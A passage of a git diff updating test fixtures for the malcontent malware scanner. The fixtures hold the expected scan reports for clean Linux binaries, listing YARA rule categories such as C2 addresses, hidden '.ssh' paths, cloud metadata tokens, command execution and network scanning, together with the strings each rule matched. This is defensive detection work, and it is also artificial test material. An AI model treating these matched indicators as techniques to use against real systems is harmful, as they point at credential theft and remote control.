| MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [http://%sIncrementDecrementN1QLQueryGetRandom/api/pingrangeScanObserveVba](http://%sIncrementDecrementN1QLQueryGetRandom/api/pingrangeScanObserveVba)
[https://%s.api.mailchimp.com/3.0/https](https://%s.api.mailchimp.com/3.0/https)
[https://%s.api.mailchimp.com/3.0https](https://%s.api.mailchimp.com/3.0https)
[https://%s.billomat.net/api/v2/clients/myself](https://%s.billomat.net/api/v2/clients/myself)
[https://%s.caspio.com/oauth/tokenhttps](https://%s.caspio.com/oauth/tokenhttps)
[https://%s.currencycloud.com](https://%s.currencycloud.com)
[https://%s.fibery.io/api/commandsTruffleHog3](https://%s.fibery.io/api/commandsTruffleHog3)
[https://%s.flowlu.com/api/v1/module/crm/lead/list](https://%s.flowlu.com/api/v1/module/crm/lead/list)
[https://%s.formsite.com/api/v2/](https://%s.formsite.com/api/v2/)
[https://%s.kanbantool.com/api/v3/users/current.jsonhttps](https://%s.kanbantool.com/api/v3/users/current.jsonhttps)
[https://%s.leankit.com/io/accounthttps](https://%s.leankit.com/io/accounthttps)
[https://%s.s3](https://%s.s3)
[https://%s.salesmate.io/apis/v3/companies/1](https://%s.salesmate.io/apis/v3/companies/1)
[https://%s.scalr.io/api/iacp/v3/agentshttps](https://%s.scalr.io/api/iacp/v3/agentshttps)
[https://%s.vouchery.io/api/v2.0/usershttps](https://%s.vouchery.io/api/v2.0/usershttps)
[https://%s/account.json](https://%s/account.json)
[https://%s/admin/api/2024](https://%s/admin/api/2024)
[https://%s/admin/oauth/access_scopes.jsonadmin.conversations.removeCustomR](https://%s/admin/oauth/access_scopes.jsonadmin.conversations.removeCustomR)
[https://%s/api/laml/2010](https://%s/api/laml/2010)
[https://%s/api/v1/me20060102T150405Z0700InvalidClientTokenIdx](https://%s/api/v1/me20060102T150405Z0700InvalidClientTokenIdx)
[https://%s/api/v1/projects](https://%s/api/v1/projects)
[https://%s/api/v1/sources](https://%s/api/v1/sources)
[https://%s/api/v1/users/meopsgenie.com/alert/detail/https](https://%s/api/v1/users/meopsgenie.com/alert/detail/https)
[https://%s/api/v1/userserror](https://%s/api/v1/userserror)
[https://%s/api/v2/tickets](https://%s/api/v2/tickets)
[https://%s/api/v3/users/current.json](https://%s/api/v3/users/current.json)
[https://%s/auth/oauth2/v2/tokenhttps](https://%s/auth/oauth2/v2/tokenhttps)
[https://%s/invoices.json](https://%s/invoices.json)
[https://%s/v2/lastUpdateTimeBeamer](https://%s/v2/lastUpdateTimeBeamer)
[https://%sSCRAM](https://%sSCRAM) |
| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[aIp](https://github.com/search?q=aIp&type=code)
[a_ip](https://github.com/search?q=a_ip&type=code)
[accel_port](https://github.com/search?q=accel_port&type=code)
[allowed_port](https://github.com/search?q=allowed_port&type=code)
[announce_port](https://github.com/search?q=announce_port&type=code)
[client_ip](https://github.com/search?q=client_ip&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[fastly_ip](https://github.com/search?q=fastly_ip&type=code)
[firewall_ip](https://github.com/search?q=firewall_ip&type=code)
[geo_ip](https://github.com/search?q=geo_ip&type=code)
[getPort](https://github.com/search?q=getPort&type=code)
[hasPort](https://github.com/search?q=hasPort&type=code)
[htcp_port](https://github.com/search?q=htcp_port&type=code)
[http_port](https://github.com/search?q=http_port&type=code)
[i_ip](https://github.com/search?q=i_ip&type=code)
[icp_port](https://github.com/search?q=icp_port&type=code)
[in_ip](https://github.com/search?q=in_ip&type=code)
[ip_port](https://github.com/search?q=ip_port&type=code)
[is_port](https://github.com/search?q=is_port&type=code)
[lIp](https://github.com/search?q=lIp&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[lookupPort](https://github.com/search?q=lookupPort&type=code)
[m_ip](https://github.com/search?q=m_ip&type=code)
[miss_port](https://github.com/search?q=miss_port&type=code)
[nIp](https://github.com/search?q=nIp&type=code)
[oIp](https://github.com/search?q=oIp&type=code)
[old_ip](https://github.com/search?q=old_ip&type=code)
[open_port](https://github.com/search?q=open_port&type=code)
[pages_ip](https://github.com/search?q=pages_ip&type=code)
[parsePort](https://github.com/search?q=parsePort&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[privateIp](https://github.com/search?q=privateIp&type=code)
[relay_port](https://github.com/search?q=relay_port&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[routedPort](https://github.com/search?q=routedPort&type=code)
[snmp_port](https://github.com/search?q=snmp_port&type=code)
[snmpd_port](https://github.com/search?q=snmpd_port&type=code)
[stripPort](https://github.com/search?q=stripPort&type=code)
[tIp](https://github.com/search?q=tIp&type=code)
[vIp](https://github.com/search?q=vIp&type=code) |
+| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [ConnectServer](https://github.com/search?q=ConnectServer&type=code) |
| MEDIUM | [c2/discovery/ip_dns_resolver](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#google_dns_ip) | contains Google Public DNS resolver IP | [8.8.8.8](https://github.com/search?q=8.8.8.8&type=code) |
| MEDIUM | [collect/archives/unarchive](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/unarchive.yara#unarchive) | unarchives files | [UnarchiveProject](https://github.com/search?q=UnarchiveProject&type=code)
[unarchiveadmin](https://github.com/search?q=unarchiveadmin&type=code)
[unarchiveapp_configurations](https://github.com/search?q=unarchiveapp_configurations&type=code) |
| MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [archive/zip](https://github.com/search?q=archive%2Fzip&type=code) |
@@ -46,8 +47,8 @@
| MEDIUM | [discover/network/netstat](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/netstat.yara#netstat) | Uses 'netstat' for network information | [netstat](https://github.com/search?q=netstat&type=code) |
| MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) |
| MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) |
-| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#dynamic_hidden_path) | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.ssh](https://github.com/search?q=%25s%2F.ssh&type=code) |
-| MEDIUM | [evasion/hidden_paths/var_run](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/var-run.yara#var_run_subfolder) | references subfolder within /var/run | [/var/run/slapd/](https://github.com/search?q=%2Fvar%2Frun%2Fslapd%2F&type=code) |
+| MEDIUM | [evasion/file/location/var_run](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/var-run.yara#var_run_subfolder) | references subfolder within /var/run | [/var/run/slapd/](https://github.com/search?q=%2Fvar%2Frun%2Fslapd%2F&type=code) |
+| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#dynamic_hidden_path) | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.ssh](https://github.com/search?q=%25s%2F.ssh&type=code) |
| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [ExecCommand](https://github.com/search?q=ExecCommand&type=code)
[Execute_Command_Line](https://github.com/search?q=Execute_Command_Line&type=code)
[MergeRunCmdOptions](https://github.com/search?q=MergeRunCmdOptions&type=code)
[RunCommandCursor](https://github.com/search?q=RunCommandCursor&type=code)
[StartCmdTrace](https://github.com/search?q=StartCmdTrace&type=code)
[StartCommandOptions](https://github.com/search?q=StartCommandOptions&type=code)
[execTxCommand](https://github.com/search?q=execTxCommand&type=code)
[executeCommand](https://github.com/search?q=executeCommand&type=code)
[processRunCommand](https://github.com/search?q=processRunCommand&type=code)
[runGitCommand](https://github.com/search?q=runGitCommand&type=code)
[runShellCommandAsynchronously](https://github.com/search?q=runShellCommandAsynchronously&type=code) |
| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#exec_cmd_run) | executes external programs | [).CombinedOutput](https://github.com/search?q=%29.CombinedOutput&type=code)
[exec.(*Cmd).Run](https://github.com/search?q=exec.%28%2ACmd%29.Run&type=code) |
| MEDIUM | [exec/script/osa](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/script/osascript.yara#osascript_caller) | osascript caller | [display dialog](https://github.com/search?q=display+dialog&type=code) |
@@ -68,7 +69,7 @@
| MEDIUM | [fs/proc/self_mountinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-mountinfo.yara#proc_self_mountinfo) | gets mount info associated to this process | [/proc/self/mountinfo](https://github.com/search?q=%2Fproc%2Fself%2Fmountinfo&type=code) |
| MEDIUM | [impact/ddos](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/ddos/ddos.yara#ddos) | References DDoS | [DDoS](https://github.com/search?q=DDoS&type=code) |
| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [:CodeWithScopeSpacerheartbeatinterval](https://github.com/search?q=%3ACodeWithScopeSpacerheartbeatinterval&type=code)
[ConnServer heartbeat started](https://github.com/search?q=ConnServer+heartbeat+started&type=code)
[HeartbeatMS](https://github.com/search?q=HeartbeatMS&type=code)
[SetHeartbeatInterval](https://github.com/search?q=SetHeartbeatInterval&type=code)
[WithHeartbeatInterval](https://github.com/search?q=WithHeartbeatInterval&type=code)
[WithHeartbeatTimeout](https://github.com/search?q=WithHeartbeatTimeout&type=code)
[be greater than or equal to the heartbeat interva](https://github.com/search?q=be+greater+than+or+equal+to+the+heartbeat+interva&type=code)
[comWriteDocumentElementheartbeatfrequenc](https://github.com/search?q=comWriteDocumentElementheartbeatfrequenc&type=code)
[comheartbeatMain: re](https://github.com/search?q=comheartbeatMain%3A+re&type=code)
[crc32Rolling backcleanup docsheartbeat_msgeo_d](https://github.com/search?q=crc32Rolling+backcleanup+docsheartbeat_msgeo_d&type=code)
[edConnection pool clearedServer heartbeat failedS](https://github.com/search?q=edConnection+pool+clearedServer+heartbeat+failedS&type=code)
[edclient_sql_exceptionFailed to heartbeat](https://github.com/search?q=edclient_sql_exceptionFailed+to+heartbeat&type=code)
[eerror setting read deadline in heartbeater:](https://github.com/search?q=eerror+setting+read+deadline+in+heartbeater%3A&type=code)
[eonly valid as initial handshakeheartbeat is not](https://github.com/search?q=eonly+valid+as+initial+handshakeheartbeat+is+not&type=code)
[heartbeatCtxCance](https://github.com/search?q=heartbeatCtxCance&type=code)
[heartbeatFrame](https://github.com/search?q=heartbeatFrame&type=code)
[heartbeatInterval](https://github.com/search?q=heartbeatInterval&type=code)
[heartbeatLock](https://github.com/search?q=heartbeatLock&type=code)
[heartbeatTimeout](https://github.com/search?q=heartbeatTimeout&type=code)
[icedisableConsoleLoginfailed to heartbeat](https://github.com/search?q=icedisableConsoleLoginfailed+to+heartbeat&type=code)
[newHeartbeatDuration](https://github.com/search?q=newHeartbeatDuration&type=code)
[orcHeartbeating](https://github.com/search?q=orcHeartbeating&type=code)
[overflow reading version stringHeartbeats should](https://github.com/search?q=overflow+reading+version+stringHeartbeats+should&type=code)
[parquetheartbeat started](https://github.com/search?q=parquetheartbeat+started&type=code)
[parseHeartbeatFrame](https://github.com/search?q=parseHeartbeatFrame&type=code)
[pollHeartbeatTime](https://github.com/search?q=pollHeartbeatTime&type=code)
[publishServerHeartbeatFailedEv](https://github.com/search?q=publishServerHeartbeatFailedEv&type=code)
[publishServerHeartbeatStartedE](https://github.com/search?q=publishServerHeartbeatStartedE&type=code)
[publishServerHeartbeatSucceede](https://github.com/search?q=publishServerHeartbeatSucceede&type=code)
[setupHeartbeatConnecti](https://github.com/search?q=setupHeartbeatConnecti&type=code)
[sha1publickeysubsystemheartbeatwithcoor](https://github.com/search?q=sha1publickeysubsystemheartbeatwithcoor&type=code)
[sheartbeat stopped](https://github.com/search?q=sheartbeat+stopped&type=code)
[startHeartBeat](https://github.com/search?q=startHeartBeat&type=code)
[stopHeartBeat](https://github.com/search?q=stopHeartBeat&type=code)
[swordincludeRetryReasonstopping heartbeat](https://github.com/search?q=swordincludeRetryReasonstopping+heartbeat&type=code)
[tarting server monitoringServer heartbeat succeed](https://github.com/search?q=tarting+server+monitoringServer+heartbeat+succeed&type=code) |
-| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) |
+| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) |
| MEDIUM | [net/dns/reverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-reverse.yara#in_addr_arpa) | looks up the reverse hostname for an IP | [.in-addr.arpa](https://github.com/search?q=.in-addr.arpa&type=code)
[ip6.arpa](https://github.com/search?q=ip6.arpa&type=code) |
| MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [DoneDownloadCond](https://github.com/search?q=DoneDownloadCond&type=code)
[DownloadArtifactsFile](https://github.com/search?q=DownloadArtifactsFile&type=code)
[DownloadAvatar](https://github.com/search?q=DownloadAvatar&type=code)
[DownloadContentsWithMeta](https://github.com/search?q=DownloadContentsWithMeta&type=code)
[DownloadPackageFile](https://github.com/search?q=DownloadPackageFile&type=code)
[DownloadReleaseAsset](https://github.com/search?q=DownloadReleaseAsset&type=code)
[ExportDownload](https://github.com/search?q=ExportDownload&type=code)
[FTPDownload](https://github.com/search?q=FTPDownload&type=code)
[FailedDownloads](https://github.com/search?q=FailedDownloads&type=code)
[FuncDownloadHelper](https://github.com/search?q=FuncDownloadHelper&type=code)
[GeoIpDownloadStatistics](https://github.com/search?q=GeoIpDownloadStatistics&type=code)
[GetArchiveDownloadURL](https://github.com/search?q=GetArchiveDownloadURL&type=code)
[GetBrowserDownloadURL](https://github.com/search?q=GetBrowserDownloadURL&type=code)
[GetDownloadCount](https://github.com/search?q=GetDownloadCount&type=code)
[GetDownloadLocation](https://github.com/search?q=GetDownloadLocation&type=code)
[GetDownloadURL](https://github.com/search?q=GetDownloadURL&type=code)
[GetDownloadsURL](https://github.com/search?q=GetDownloadsURL&type=code)
[GetHasDownloads](https://github.com/search?q=GetHasDownloads&type=code)
[GetTempDownloadToken](https://github.com/search?q=GetTempDownloadToken&type=code)
[MFA_TOKENdownload start chunk](https://github.com/search?q=MFA_TOKENdownload+start+chunk&type=code)
[NextDownloader](https://github.com/search?q=NextDownloader&type=code)
[NodeInfoIngestDownloader](https://github.com/search?q=NodeInfoIngestDownloader&type=code)
[STREAM_CHUNK_DOWNLOADSF_CLIENT_CONFIG](https://github.com/search?q=STREAM_CHUNK_DOWNLOADSF_CLIENT_CONFIG&type=code)
[SuccessfulDownloads](https://github.com/search?q=SuccessfulDownloads&type=code)
[URLDownloadToFile](https://github.com/search?q=URLDownloadToFile&type=code)
[addDownloader](https://github.com/search?q=addDownloader&type=code)
[archive_download_url](https://github.com/search?q=archive_download_url&type=code)
[browser_download_url](https://github.com/search?q=browser_download_url&type=code)
[chunkDownloader](https://github.com/search?q=chunkDownloader&type=code)
[chunk_downloader](https://github.com/search?q=chunk_downloader&type=code)
[downloadChunkHelper](https://github.com/search?q=downloadChunkHelper&type=code)
[downloadH](https://github.com/search?q=downloadH&type=code)
[downloadLocation](https://github.com/search?q=downloadLocation&type=code)
[downloadOCSPCacheServer](https://github.com/search?q=downloadOCSPCacheServer&type=code)
[downloadPatches](https://github.com/search?q=downloadPatches&type=code)
[download_count](https://github.com/search?q=download_count&type=code)
[downloader id](https://github.com/search?q=downloader+id&type=code)
[downloads_url](https://github.com/search?q=downloads_url&type=code)
[downloadsrepos](https://github.com/search?q=downloadsrepos&type=code)
[failed_downloads](https://github.com/search?q=failed_downloads&type=code)
[funcDownloadHelper](https://github.com/search?q=funcDownloadHelper&type=code)
[geoipdownloadstatistics](https://github.com/search?q=geoipdownloadstatistics&type=code)
[getNextChunkDownloader](https://github.com/search?q=getNextChunkDownloader&type=code)
[has_downloads](https://github.com/search?q=has_downloads&type=code)
[methodTotalDownloadTimeshards](https://github.com/search?q=methodTotalDownloadTimeshards&type=code)
[newStreamChunkDownloader](https://github.com/search?q=newStreamChunkDownloader&type=code)
[nodeinfoingestdownloader](https://github.com/search?q=nodeinfoingestdownloader&type=code)
[populateChunkDownloader](https://github.com/search?q=populateChunkDownloader&type=code)
[profileno download link found for](https://github.com/search?q=profileno+download+link+found+for&type=code)
[setNextChunkDownloader](https://github.com/search?q=setNextChunkDownloader&type=code)
[snowflakeChunkDownloader](https://github.com/search?q=snowflakeChunkDownloader&type=code)
[sstart downloading](https://github.com/search?q=sstart+downloading&type=code)
[streamChunkDownloader](https://github.com/search?q=streamChunkDownloader&type=code)
[successful_downloads](https://github.com/search?q=successful_downloads&type=code)
[tailChunkDownloader](https://github.com/search?q=tailChunkDownloader&type=code)
[temp_download_token](https://github.com/search?q=temp_download_token&type=code)
[the scheduleddownloads](https://github.com/search?q=the+scheduleddownloads&type=code)
[theequationsdownload](https://github.com/search?q=theequationsdownload&type=code)
[thresholddownloading error](https://github.com/search?q=thresholddownloading+error&type=code)
[total_download_time](https://github.com/search?q=total_download_time&type=code)
[useStreamDownloader](https://github.com/search?q=useStreamDownloader&type=code)
[vMaxChunkDownloadWorkers](https://github.com/search?q=vMaxChunkDownloadWorkers&type=code)
[vmsdownloading done](https://github.com/search?q=vmsdownloading+done&type=code)
[wcould not download file for scan](https://github.com/search?q=wcould+not+download+file+for+scan&type=code)
[wfailed to download patches](https://github.com/search?q=wfailed+to+download+patches&type=code)
[when trying to download file for scan](https://github.com/search?q=when+trying+to+download+file+for+scan&type=code) |
| MEDIUM | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_value) | Invokes curl | [curl / libcurl / php_curl](https://github.com/search?q=curl+%2F+libcurl+%2F+php_curl&type=code) |
@@ -114,8 +115,9 @@
| LOW | [discover/cloud/aws_metadata](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/aws-metadata.yara#aws_metadata) | References the AWS EC2 metadata token | [X-aws-ec2-metadata-token](https://github.com/search?q=X-aws-ec2-metadata-token&type=code) |
| LOW | [discover/cloud/google_metadata](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/google-metadata.yara#google_metadata) | Includes the token required to use the Google Cloud Platform metadata server | [Metadata-Flavor](https://github.com/search?q=Metadata-Flavor&type=code) |
| LOW | [discover/cloud/google_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/google-storage.yara#go_import) | Capable of using Google Cloud Storage (GCS) | [cloud.google.com/go/storage](https://github.com/search?q=cloud.google.com%2Fgo%2Fstorage&type=code) |
-| LOW | [discover/system/cpu_info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu-info.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) |
-| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [/proc/sys/kernel/hostname](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostname&type=code) |
+| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
+| LOW | [discover/system/cpu](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) |
+| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [/proc/sys/kernel/hostname](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostname&type=code) |
| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [syscall.Uname](https://github.com/search?q=syscall.Uname&type=code)
[uname](https://github.com/search?q=uname&type=code) |
| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
@@ -183,6 +185,5 @@
| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real, effective, and saved group ID of process | [setgid](https://github.com/search?q=setgid&type=code) |
| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) |
| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) |
-| LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) |
diff --git a/tests/linux/clean/wolfictl.simple b/tests/linux/clean/wolfictl.simple
index b371cf324..519799bc3 100644
--- a/tests/linux/clean/wolfictl.simple
+++ b/tests/linux/clean/wolfictl.simple
@@ -45,8 +45,9 @@ discover/network/interface_list: medium
discover/network/mac_address: medium
discover/network/netstat: medium
discover/processes/pgrep: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/dmesg: low
+discover/system/hostname: low
discover/system/platform: medium
discover/system/sysinfo: medium
discover/user/HOME: low
@@ -54,9 +55,9 @@ discover/user/USER: low
discover/user/name_get: medium
evasion/bypass_security/linux/se: medium
evasion/bypass_security/macos/xprotect: medium
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/hidden: medium
-evasion/hide_artifacts/system_directories: medium
+evasion/file/location/dev_shm: medium
+evasion/file/location/system_directory: medium
+evasion/file/prefix: medium
exec/cmd: medium
exec/conditional/LANG: low
exec/dylib/symbol_address: medium
diff --git a/tests/linux/clean/zipdetails.md b/tests/linux/clean/zipdetails.md
index 78f16d5fd..68b70d3b9 100644
--- a/tests/linux/clean/zipdetails.md
+++ b/tests/linux/clean/zipdetails.md
@@ -5,7 +5,7 @@
| MEDIUM | [anti-static/obfuscation/bitwise](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/bitwise.yara#bidirectional_bitwise_math) | [uses bitwise math in both directions](https://www.reversinglabs.com/blog/python-downloader-highlights-noise-problem-in-open-source-threat-detection) | [1 << 0](https://github.com/search?q=1+%3C%3C+0&type=code)
[1 << 11](https://github.com/search?q=1+%3C%3C+11&type=code)
[1 << 3](https://github.com/search?q=1+%3C%3C+3&type=code)
[1 << 4](https://github.com/search?q=1+%3C%3C+4&type=code)
[1 << 5](https://github.com/search?q=1+%3C%3C+5&type=code)
[1 << 6](https://github.com/search?q=1+%3C%3C+6&type=code)
[2 << 1](https://github.com/search?q=2+%3C%3C+1&type=code)
[dt << 1](https://github.com/search?q=dt+%3C%3C+1&type=code)
[dt >> 11](https://github.com/search?q=dt+%3E%3E+11&type=code)
[dt >> 16](https://github.com/search?q=dt+%3E%3E+16&type=code)
[dt >> 21](https://github.com/search?q=dt+%3E%3E+21&type=code)
[dt >> 25](https://github.com/search?q=dt+%3E%3E+25&type=code)
[dt >> 5](https://github.com/search?q=dt+%3E%3E+5&type=code)
[got << 8](https://github.com/search?q=got+%3C%3C+8&type=code)
[gp >> 1](https://github.com/search?q=gp+%3E%3E+1&type=code) |
| MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#excessive_hex_refs) | many references to hexadecimal values | [0x0001](https://github.com/search?q=0x0001&type=code)
[0x0007](https://github.com/search?q=0x0007&type=code)
[0x0008](https://github.com/search?q=0x0008&type=code)
[0x0009](https://github.com/search?q=0x0009&type=code)
[0x000a](https://github.com/search?q=0x000a&type=code)
[0x000c](https://github.com/search?q=0x000c&type=code)
[0x000d](https://github.com/search?q=0x000d&type=code)
[0x000e](https://github.com/search?q=0x000e&type=code)
[0x000f](https://github.com/search?q=0x000f&type=code)
[0x0014](https://github.com/search?q=0x0014&type=code)
[0x0015](https://github.com/search?q=0x0015&type=code)
[0x0016](https://github.com/search?q=0x0016&type=code)
[0x0017](https://github.com/search?q=0x0017&type=code)
[0x0018](https://github.com/search?q=0x0018&type=code)
[0x0019](https://github.com/search?q=0x0019&type=code)
[0x0020](https://github.com/search?q=0x0020&type=code)
[0x0021](https://github.com/search?q=0x0021&type=code)
[0x0022](https://github.com/search?q=0x0022&type=code)
[0x0023](https://github.com/search?q=0x0023&type=code)
[0x0065](https://github.com/search?q=0x0065&type=code)
[0x0066](https://github.com/search?q=0x0066&type=code)
[0x01](https://github.com/search?q=0x01&type=code)
[0x02014b50](https://github.com/search?q=0x02014b50&type=code)
[0x03](https://github.com/search?q=0x03&type=code)
[0x04034b50](https://github.com/search?q=0x04034b50&type=code)
[0x05054b50](https://github.com/search?q=0x05054b50&type=code)
[0x06054b50](https://github.com/search?q=0x06054b50&type=code)
[0x06064b50](https://github.com/search?q=0x06064b50&type=code)
[0x07064b50](https://github.com/search?q=0x07064b50&type=code)
[0x07c8](https://github.com/search?q=0x07c8&type=code)
[0x08064b50](https://github.com/search?q=0x08064b50&type=code)
[0x08074b50](https://github.com/search?q=0x08074b50&type=code)
[0x0f](https://github.com/search?q=0x0f&type=code)
[0x10000000](https://github.com/search?q=0x10000000&type=code)
[0x19DB1DED](https://github.com/search?q=0x19DB1DED&type=code)
[0x1f](https://github.com/search?q=0x1f&type=code)
[0x20](https://github.com/search?q=0x20&type=code)
[0x2146444e](https://github.com/search?q=0x2146444e&type=code)
[0x2605](https://github.com/search?q=0x2605&type=code)
[0x2705](https://github.com/search?q=0x2705&type=code)
[0x2805](https://github.com/search?q=0x2805&type=code)
[0x334d](https://github.com/search?q=0x334d&type=code)
[0x3e](https://github.com/search?q=0x3e&type=code)
[0x3f](https://github.com/search?q=0x3f&type=code)
[0x4154](https://github.com/search?q=0x4154&type=code)
[0x42726577](https://github.com/search?q=0x42726577&type=code)
[0x4341](https://github.com/search?q=0x4341&type=code)
[0x4453](https://github.com/search?q=0x4453&type=code)
[0x4690](https://github.com/search?q=0x4690&type=code)
[0x4704](https://github.com/search?q=0x4704&type=code)
[0x470f](https://github.com/search?q=0x470f&type=code)
[0x4854](https://github.com/search?q=0x4854&type=code)
[0x4b46](https://github.com/search?q=0x4b46&type=code)
[0x4c41](https://github.com/search?q=0x4c41&type=code)
[0x4d49](https://github.com/search?q=0x4d49&type=code)
[0x4d63](https://github.com/search?q=0x4d63&type=code)
[0x4f4c](https://github.com/search?q=0x4f4c&type=code)
[0x504b4453](https://github.com/search?q=0x504b4453&type=code)
[0x5356](https://github.com/search?q=0x5356&type=code)
